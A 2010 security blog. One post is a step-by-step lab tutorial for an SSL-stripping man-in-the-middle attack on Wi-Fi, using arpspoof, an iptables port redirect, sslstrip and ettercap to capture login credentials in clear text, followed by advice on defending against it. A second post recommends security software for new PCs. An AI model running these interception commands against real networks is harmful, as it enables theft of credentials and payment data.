Thursday, July 29, 2010

Insecurities of Today's Websites and How to Abate the Risk

Online activities by individuals are growing on a daily basis from social networking, communications by e-mail, shopping, money transferring through third parties, etc.  End-users expect these activities or transactions to be secure through username/password and SSL encryption.  Unfortunately, this is not the case with most popular websites.  I will be demonstrating the insecurities of common websites by intercepting username/password in clear text and at the end of the presentation I will present a solution to prevent you from being a victim  from this type of attack.

Presently, there is a false assumption of online security.  For example, when a user visits facebook.com, the address will display http://www.facebook.com.  The user enters their username/password and clicks "login."  The action of clicking "login" takes users to the encrypted site of facebook.com.  The user can verify this by viewing the address change to https://www.facebook.com.  The added "s" at the end of http stands for "secure" by using SSL/TLS protocol to provide encryption and secure identification.

The issue with this type of design is the initial unencrypted page when the user enters their information.  An attacker can intercept this session before the information is encrypted and sent for verification to Facebook server; afterward, the attacker sends the information to Facebook server for the user to receive the information they have requested.  The user will never know the attack is happening.  The attack is called Man-in-the-Middle (MITM).  In short, the attacker is in between the user's computer and the website's server viewing/recording all communication.


Now, for the demonstration.

Cracking Tutorial

Needed Equipment:

1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools.  We will be using Ettercap and SSLStrip.  These tools are included with Backtrack distribution.
  • This link provides detailed instructions on multiple ways to run Backtrack on your computer.
2. A wireless adapter that allows passive packet sniffing and packet injection.  I am using Alfa AWUS036H Wireless Adapter.  The USB connection, good antenna, and ease of use makes the adapter a good choice.

3. A test network lab with two computers - the attacker and the victim - and a router or wireless access point.  I will be using a wireless access point to demonstrate the ease of the attack and the needed security awareness and precautions when accessing open Wi-Fi areas.

Steps:

1.    Boot up Backtrack.  The login is "root" and the password is "toor."  Do not include quotes or the period at the end of toor.  Type "startx" at the next prompt.

2.    Open up a Konsole window.  It is the 3rd icon from the bottom right.

3.    Type /etc/init.d/wicd start

4.    Click the KDE menu / go to Internet / click Wicd Network Manager and connect to the particular network.  Close the window and go back to the Konsole window.

5.    Type clear and hit enter

6.    Type kate /etc/etter.conf


7.    This command will open the file etter.conf in a notepad-type program called Kate.

8.    Scroll down to the "Linux" section and delete the two pound signs under "if you use iptables:."  



9.    Once you have completed the step, save the file and close the window.  The pound signs were used for comments.  In programming, comments are put in for the programmer and not for the program.  Consequently, these two lines of codes would not have run when needed for later in the demonstration.

10.    Go back to the Konsole window and type echo 1 > /proc/sys/net/ipv4/ip_forward


 11.    The command forwards IP (Internet Protocol) communication to our computer.  This allows our Backtrack computer to act as a router and receive communication from our target/victim.  In short, our victim's computer will send all their traffic to our computer instead of the wireless router access point.

12.    Type clear to clear our window.

13.    Type arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
  • This allows us to send unsolicited ARP responses and let us become any IP address on a local network.
  • -i stands for interface that we are using; which is wlan0.
  • -t stands for target.  Following the option is the target/victim's IP address, which is 192.168.1. 100
  • Following the victim's IP address is the actual wireless router (gateway) IP address that we are becoming and fooling the victim's computer into sending us their traffic.
  • When we hit enter, we start letting the victim know that the gateway IP is our MAC address.  Now, our target is going to be sending their traffic to us instead of the real gateway.
14.    To discover your interface on Backtrack, open a Konsole window and type ifconfig.  Whatever interface has an IP address is the interface that you are utilizing.


15.    My target computer is a Windows machine.  To know the IP address, go to Start and type cmd in the run/search box.  Type ipconfig to know your Ethernet adapter IP address.


16.    You will see the target IP address; as well as, the gateway IP address.

17.    When you type the arpspoof command and hit enter, you should see the following screenshots.


18.    Now, open a new Konsole window or new shell (by going to session/shell) and type iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  • This command reroutes communication coming from port 80 to port 10000 on our computer.  We are going to be setting up SSLstrip to be listening on port 10000 on our system.

19.    Hit enter and type clear and hit enter to clear screen.

20.    Type, sslstrip -a -k -f
  • -a means to log all SSL and HTTP traffic to and from server
  • -k means kill sessions in progress.  For example, if they were logged into Gmail, Facebook, Paypal, etc., this command would log them out of the site; therefore, they could log back in with their credentials.
  • -f means to put a fake lock on the browser to make it seem the connection is secure.

21.    Hit enter, this will create a sslstrip.log file on your desktop.  This file will log all the traffic from your victim.


22.    Now, open a new Konsole window or shell (by going to session/shell).

23.    Type ettercap -T -q -i wlan0
  • -T means to display text
  • -q means to be quiet and do not display packet contents.  
  • -i means interface that we are using.
  • On the actual Konsole window we are using, the username/passwords will display when the user logs into a website.  This happens instantaneously.  For further details in their Internet usage, you can view the sslstrip.log file on your desktop.

24.    Hit enter and the following screenshot will display


25.    When your target visits a website requiring a username/password, it will automatically be posted onto your screen in clear text.  This is due to the SSL encrypted session being stripped and a phony lock being posted on the browser to make it seem the session is still secure.  The following screen shots displays examples of a SSL session being stripped.  The first one is a secure session by examining there is a "s" at the end of "http" and there is a legit certificate at the right hand side of the address bar.  The second one is a SSL session being stripped by examining there is not a "s" at the end of "http" and by seeing the phony lock at the left hand side of the address bar.  Internet Explorer does not display the lock at the left hand side.  For Mozilla Firefox, they display a green bar or a blue bar depending on the security level at the left hand side of the address bar.


26.    Now, for the intercepting of the target's traffic.  I posted multiple screenshots of different websites that require a username/password.  The last screen shot will display the username/password in clear text.

Username: shbelay / Password: password
Username: shbelay@gmail.com / Password: password
Username: shbelay / Password: password


As you can see, the username/password is in red and the website information I intercepted is in green.  I was able to do this with multiple websites; including, Paypal, Hotmail, and Amazon.  Furthermore, the "sslstrip.log" file will log your entire browsing session.  This possibly will be able to log personal identifiable information and credit card numbers.

How to Protect Yourself

Protecting yourself online from these type of attacks is as simple as typing "https://" before the website address to ensure that you are on a secure website.  The issue presently is websites put their username/password boxes on an unsecured website.  For example when you enter the following addresses: amazon.com; facebook.com; ebay.com; paypal.com; etc., you will receive an "http" site.

Of course, no one wants to type "https" every time they logon to a website.  An easy substitution for this task is to install a Mozilla Firefox add-on called HTTPS Everywhere.  Unfortunately, Internet Explorer does not have this capability.  As a result, I recommend using Mozilla Firefox for this issue, unless you are willing to type "https://" every time in Internet Explorer.

I installed this add-on and was unable to strip the SSL connection.  I received the following screenshots when viewing the following websites:


The browser is informing me that it cannot verify the certificate of the website's server and to exit or enter at your own risk.  As always, I will mention that there is not a computer or network that is completely secure.  The intention is to become more secure than the next computer/network or make it as difficult to break into the security barriers.

Thursday, July 8, 2010

Security Essentials for a New Personal Computer

Identity theft and malware are on a rapid rise for profit.  Black hat hacking has become a billion dollar business through anonymity and covert operations.  For individuals buying new computers, it is essential to install a few security programs.  When connecting to the Internet with a computer as bought, it is within a short period of time (most likely within an hour) the computer will be cracked without warning.  Anti-virus software and spyware/malware protection software is not enough for the sophistication and ease-of-use of today's hacker tools.

Anybody can become a victim without proper precautions.  For those still skeptical, there are plenty of Trojans available for purchase on the Internet that are made specifically to steal bank account information, social security numbers, or any personal identifiable information.  Black hat hackers scan the Internet for open ports and send these Trojans through the ports or by e-mail through phishing.  Once installed and undetected, the information is automatically sent back to the perpetrator.  This happens without the person's knowledge while logging into their bank site, filling out forms for credit cards, or buying an item online.  We have to be very cautious and use good judgment while surfing the web.

The following are free software that I recommend to install immediately when a new computer is bought.

  1. Anti-virus Software is needed to protect your computer from viruses before they cause any damage.  Avast (download) is widely used and respected.  Avast has one for purchase for greater protection.
  2. Spyware/Adaware/Malware protection is needed to protect your browsing information from being logged and sent back to the creator without permission and possibly for malicious intent.  I install three programs since each of them usually catch malicious software that was not caught by the others.  The following are: Ad-aware, Malwarebytes, and Spybot.
  3. Firewall is extremely important to keep hackers away.  As mentioned, they look for open ports used by the individual's computer to have complete access.  Firewalls can be configured to block all incoming connections until the user permits access.  The firewall I use is Comodo Firewall.
  4. Microsoft Security Essentials is an incredible product that provides real-time protection.  I found that this product usually catches malicious software before my anti-virus software and malware protection software.  Microsoft continuously updates this product with the latest threats.
  5. Registry cleaner is needed to find any suspicious files or files that stayed in the registry after uninstalling a program.  This type of software helps the system's performance.  A good software is CCleaner.
  6. Lastly and I believe most important is a patching program.  There are hacker tools that provide information on the type of software version that is installed on the computer.  If the software is not updated, it will be extremely easy to crack into the computer through information provided by the manufacturer on the necessary update.  I installed two patching programs.  The one I regularly use is FileHippo.  In addition, I periodically use Secunia PSI.  To learn more about patching and its importance, read my blog post, Importance of Patches.

Others that would be good to have but not necessary are:

  1. Microsoft Baseline Security Analyzer is designed for IT professionals in small/medium sized business.  I have this installed for my personal computer and found it very helpful.  The program will scan Microsoft products installed on the computer and have suggestions and how-to's for making the specific Microsoft program more secure.  It is a great product.
  2. I suggest using Mozilla Firefox browser for its add-ons.  The open-source community is consisted of incredibly amazing individuals.  They write software programs and provide them to the public for free-of-use.  The following add-ons I use for safer browsing are: NoScript, AdBlock, and HTTPS Everywhere.
  • NoScript blocks software languages - Java, Javascript, Flash, etc. - that are mainly used by black hat hackers as executables to install malicous software.  You have the ability to temporarly or permanantly allow the scripts to load for the specific website.
  • AdBlock is, as you most likely have figured, an ad-blocking program.
  • HTTPS Everywhere provides a secure connection to sites that offer that option by encryption.  The following is quote from the website:
"Many sites on the web offer some limited support for encryption over HTTPS, but make it difficult to use. For instance, they may default to unencrypted HTTP, or fill encrypted pages with links that go back to the unencrypted site."
 For now, these are my recommended programs for computers to stay safe while browsing the Internet.  Though, as repeated in the information security community, security never stays stagnant and is a continuous process due to black hat hackers becoming more intelligent and their tools becoming more sophisticated in cracking computers and networks.